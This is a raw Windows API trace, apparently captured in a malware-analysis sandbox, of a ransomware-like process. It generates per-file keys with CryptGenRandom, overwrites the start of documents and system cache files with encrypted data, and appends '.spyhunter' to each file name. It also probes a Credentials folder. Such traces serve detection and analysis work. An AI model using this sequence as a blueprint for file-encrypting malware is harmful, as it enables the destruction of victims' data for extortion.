[0141.132] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0141.132] ReadFile (in: hFile=0x170, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf04c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf04c*=0x0, lpOverlapped=0x0) returned 1 [0141.132] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.132] WriteFile (in: hFile=0x170, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x25cf04c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf04c*=0x0, lpOverlapped=0x0) returned 1 [0141.132] GetProcessHeap () returned 0x2c0000 [0141.132] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0141.132] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.132] WriteFile (in: hFile=0x170, lpBuffer=0x25cf08c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf04c, lpOverlapped=0x0 | out: lpBuffer=0x25cf08c*, lpNumberOfBytesWritten=0x25cf04c*=0x4, lpOverlapped=0x0) returned 1 [0141.138] WriteFile (in: hFile=0x170, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf04c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x25cf04c*=0x30, lpOverlapped=0x0) returned 1 [0141.138] CloseHandle (hObject=0x170) returned 1 [0141.138] GetProcessHeap () returned 0x2c0000 [0141.138] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f07c68 [0141.139] wnsprintfW (in: pszDest=0x2f07c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.js.spyhunter") returned 98 [0141.139] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\javascripts\\glob.js"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.js.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\javascripts\\glob.js.spyhunter")) returned 1 [0141.139] GetProcessHeap () returned 0x2c0000 [0141.139] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07c68 | out: hHeap=0x2c0000) returned 1 [0141.139] GetProcessHeap () returned 0x2c0000 [0141.139] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0141.139] GetProcessHeap () returned 0x2c0000 [0141.139] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f46428 | out: hHeap=0x2c0000) returned 1 [0141.139] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf090 | out: pbBuffer=0x25cf090) returned 1 [0141.139] GetProcessHeap () returned 0x2c0000 [0141.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0141.139] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cf088*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cf088*=0x30) returned 1 [0141.140] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\p4Emck\\YSQY-Zmw\\KhMzMfSIjaKu2zp.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\p4emck\\ysqy-zmw\\khmzmfsijaku2zp.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0141.140] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\p4Emck\\YSQY-Zmw\\KhMzMfSIjaKu2zp.ppt") returned 79 [0141.140] StrStrW (lpFirst="KhMzMfSIjaKu2zp.ppt", lpSrch=".txt") returned 0x0 [0141.140] GetProcessHeap () returned 0x2c0000 [0141.140] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0141.140] ReadFile (in: hFile=0x170, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf04c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf04c*=0x2800, lpOverlapped=0x0) returned 1 [0141.141] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.141] WriteFile (in: hFile=0x170, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf04c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf04c*=0x2800, lpOverlapped=0x0) returned 1 [0141.141] GetProcessHeap () returned 0x2c0000 [0141.141] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0141.141] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.141] WriteFile (in: hFile=0x170, lpBuffer=0x25cf08c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf04c, lpOverlapped=0x0 | out: lpBuffer=0x25cf08c*, lpNumberOfBytesWritten=0x25cf04c*=0x4, lpOverlapped=0x0) returned 1 [0141.141] WriteFile (in: hFile=0x170, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf04c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x25cf04c*=0x30, lpOverlapped=0x0) returned 1 [0141.141] CloseHandle (hObject=0x170) returned 1 [0141.148] GetProcessHeap () returned 0x2c0000 [0141.148] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e95b58 [0141.148] wnsprintfW (in: pszDest=0x2e95b58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\p4Emck\\YSQY-Zmw\\KhMzMfSIjaKu2zp.ppt.spyhunter") returned 89 [0141.148] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\p4Emck\\YSQY-Zmw\\KhMzMfSIjaKu2zp.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\p4emck\\ysqy-zmw\\khmzmfsijaku2zp.ppt"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\p4Emck\\YSQY-Zmw\\KhMzMfSIjaKu2zp.ppt.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\p4emck\\ysqy-zmw\\khmzmfsijaku2zp.ppt.spyhunter")) returned 1 [0141.183] GetProcessHeap () returned 0x2c0000 [0141.184] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e95b58 | out: hHeap=0x2c0000) returned 1 [0141.184] GetProcessHeap () returned 0x2c0000 [0141.184] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0141.184] GetProcessHeap () returned 0x2c0000 [0141.184] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2f6a0 | out: hHeap=0x2c0000) returned 1 [0141.184] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf088 | out: pbBuffer=0x25cf088) returned 1 [0141.184] GetProcessHeap () returned 0x2c0000 [0141.184] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0141.184] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cf080*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cf080*=0x30) returned 1 [0141.184] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nektUvU_3vio.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nektuvu_3vio.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0141.184] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nektUvU_3vio.xlsx") returned 61 [0141.184] StrStrW (lpFirst="nektUvU_3vio.xlsx", lpSrch=".txt") returned 0x0 [0141.184] GetProcessHeap () returned 0x2c0000 [0141.184] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0141.184] ReadFile (in: hFile=0xb4, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf044, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf044*=0x2800, lpOverlapped=0x0) returned 1 [0141.185] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.185] WriteFile (in: hFile=0xb4, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf044, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf044*=0x2800, lpOverlapped=0x0) returned 1 [0141.185] GetProcessHeap () returned 0x2c0000 [0141.185] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0141.185] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.185] WriteFile (in: hFile=0xb4, lpBuffer=0x25cf084*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf044, lpOverlapped=0x0 | out: lpBuffer=0x25cf084*, lpNumberOfBytesWritten=0x25cf044*=0x4, lpOverlapped=0x0) returned 1 [0141.185] WriteFile (in: hFile=0xb4, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf044, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x25cf044*=0x30, lpOverlapped=0x0) returned 1 [0141.186] CloseHandle (hObject=0xb4) returned 1 [0141.186] GetProcessHeap () returned 0x2c0000 [0141.186] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e95b58 [0141.186] wnsprintfW (in: pszDest=0x2e95b58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nektUvU_3vio.xlsx.spyhunter") returned 71 [0141.186] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nektUvU_3vio.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nektuvu_3vio.xlsx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nektUvU_3vio.xlsx.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nektuvu_3vio.xlsx.spyhunter")) returned 1 [0141.186] GetProcessHeap () returned 0x2c0000 [0141.186] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e95b58 | out: hHeap=0x2c0000) returned 1 [0141.186] GetProcessHeap () returned 0x2c0000 [0141.186] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0141.186] GetProcessHeap () returned 0x2c0000 [0141.187] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c85550 | out: hHeap=0x2c0000) returned 1 [0141.256] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf080 | out: pbBuffer=0x25cf080) returned 1 [0141.257] GetProcessHeap () returned 0x2c0000 [0141.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0141.257] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cf078*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cf078*=0x30) returned 1 [0141.257] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\IconCache.db" (normalized: "c:\\users\\default\\appdata\\local\\iconcache.db"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0141.258] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\IconCache.db") returned 47 [0141.258] StrStrW (lpFirst="IconCache.db", lpSrch=".txt") returned 0x0 [0141.258] GetProcessHeap () returned 0x2c0000 [0141.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0141.259] ReadFile (in: hFile=0xb4, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf03c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf03c*=0x2800, lpOverlapped=0x0) returned 1 [0141.278] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.278] WriteFile (in: hFile=0xb4, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf03c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf03c*=0x2800, lpOverlapped=0x0) returned 1 [0141.278] GetProcessHeap () returned 0x2c0000 [0141.279] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0141.279] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.279] WriteFile (in: hFile=0xb4, lpBuffer=0x25cf07c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf03c, lpOverlapped=0x0 | out: lpBuffer=0x25cf07c*, lpNumberOfBytesWritten=0x25cf03c*=0x4, lpOverlapped=0x0) returned 1 [0141.280] WriteFile (in: hFile=0xb4, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf03c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x25cf03c*=0x30, lpOverlapped=0x0) returned 1 [0141.280] CloseHandle (hObject=0xb4) returned 1 [0141.281] GetProcessHeap () returned 0x2c0000 [0141.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fd0048 [0141.281] wnsprintfW (in: pszDest=0x2fd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\IconCache.db.spyhunter") returned 57 [0141.281] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\IconCache.db" (normalized: "c:\\users\\default\\appdata\\local\\iconcache.db"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\IconCache.db.spyhunter" (normalized: "c:\\users\\default\\appdata\\local\\iconcache.db.spyhunter")) returned 1 [0141.281] GetProcessHeap () returned 0x2c0000 [0141.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fd0048 | out: hHeap=0x2c0000) returned 1 [0141.281] GetProcessHeap () returned 0x2c0000 [0141.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0141.282] GetProcessHeap () returned 0x2c0000 [0141.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33ec38 | out: hHeap=0x2c0000) returned 1 [0141.283] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf078 | out: pbBuffer=0x25cf078) returned 1 [0141.283] GetProcessHeap () returned 0x2c0000 [0141.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0141.283] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cf070*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cf070*=0x30) returned 1 [0141.283] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Credentials\\.." (normalized: "c:\\users\\default\\appdata\\local\\microsoft"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0141.283] GetProcessHeap () returned 0x2c0000 [0141.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0141.283] GetProcessHeap () returned 0x2c0000 [0141.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ffe2a8 | out: hHeap=0x2c0000) returned 1 [0141.283] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf078 | out: pbBuffer=0x25cf078) returned 1 [0141.283] GetProcessHeap () returned 0x2c0000 [0141.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0141.283] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cf070*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cf070*=0x30) returned 1 [0141.283] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Credentials\\." (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\credentials\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0141.283] GetProcessHeap () returned 0x2c0000 [0141.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0141.283] GetProcessHeap () returned 0x2c0000 [0141.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ffe1e8 | out: hHeap=0x2c0000) returned 1 [0141.293] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf068 | out: pbBuffer=0x25cf068) returned 1 [0141.293] GetProcessHeap () returned 0x2c0000 [0141.294] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0141.294] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cf060*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cf060*=0x30) returned 1 [0141.294] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0141.294] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab") returned 128 [0141.294] StrStrW (lpFirst="cab1.cab", lpSrch=".txt") returned 0x0 [0141.294] GetProcessHeap () returned 0x2c0000 [0141.294] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0141.294] ReadFile (in: hFile=0xb4, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf024, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf024*=0x2800, lpOverlapped=0x0) returned 1 [0141.407] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.407] WriteFile (in: hFile=0xb4, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf024, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf024*=0x2800, lpOverlapped=0x0) returned 1 [0141.407] GetProcessHeap () returned 0x2c0000 [0141.407] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0141.407] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.407] WriteFile (in: hFile=0xb4, lpBuffer=0x25cf064*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf024, lpOverlapped=0x0 | out: lpBuffer=0x25cf064*, lpNumberOfBytesWritten=0x25cf024*=0x4, lpOverlapped=0x0) returned 1 [0141.532] WriteFile (in: hFile=0xb4, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf024, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x25cf024*=0x30, lpOverlapped=0x0) returned 1 [0141.532] CloseHandle (hObject=0xb4) returned 1 [0141.532] GetProcessHeap () returned 0x2c0000 [0141.532] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f6eda0 [0141.532] wnsprintfW (in: pszDest=0x2f6eda0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.spyhunter") returned 138 [0141.532] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\cab1.cab"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.spyhunter" (normalized: "c:\\users\\all users\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\cab1.cab.spyhunter")) returned 1 [0141.533] GetProcessHeap () returned 0x2c0000 [0141.533] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6eda0 | out: hHeap=0x2c0000) returned 1 [0141.533] GetProcessHeap () returned 0x2c0000 [0141.533] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0141.533] GetProcessHeap () returned 0x2c0000 [0141.533] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc4aa0 | out: hHeap=0x2c0000) returned 1 [0141.533] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf060 | out: pbBuffer=0x25cf060) returned 1 [0141.533] GetProcessHeap () returned 0x2c0000 [0141.533] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0141.533] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cf058*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cf058*=0x30) returned 1 [0141.533] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\index.dat" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\index.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf0 [0141.543] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\index.dat") returned 66 [0141.543] StrStrW (lpFirst="index.dat", lpSrch=".txt") returned 0x0 [0141.543] GetProcessHeap () returned 0x2c0000 [0141.543] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0141.543] ReadFile (in: hFile=0xf0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf01c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf01c*=0x2800, lpOverlapped=0x0) returned 1 [0141.544] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.544] WriteFile (in: hFile=0xf0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf01c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf01c*=0x2800, lpOverlapped=0x0) returned 1 [0141.545] GetProcessHeap () returned 0x2c0000 [0141.545] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0141.545] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.545] WriteFile (in: hFile=0xf0, lpBuffer=0x25cf05c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf01c, lpOverlapped=0x0 | out: lpBuffer=0x25cf05c*, lpNumberOfBytesWritten=0x25cf01c*=0x4, lpOverlapped=0x0) returned 1 [0141.545] WriteFile (in: hFile=0xf0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf01c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x25cf01c*=0x30, lpOverlapped=0x0) returned 1 [0141.545] CloseHandle (hObject=0xf0) returned 1 [0141.545] GetProcessHeap () returned 0x2c0000 [0141.545] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fd0048 [0141.545] wnsprintfW (in: pszDest=0x2fd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\index.dat.spyhunter") returned 76 [0141.545] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\index.dat" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\index.dat"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\index.dat.spyhunter" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\index.dat.spyhunter")) returned 1 [0141.546] 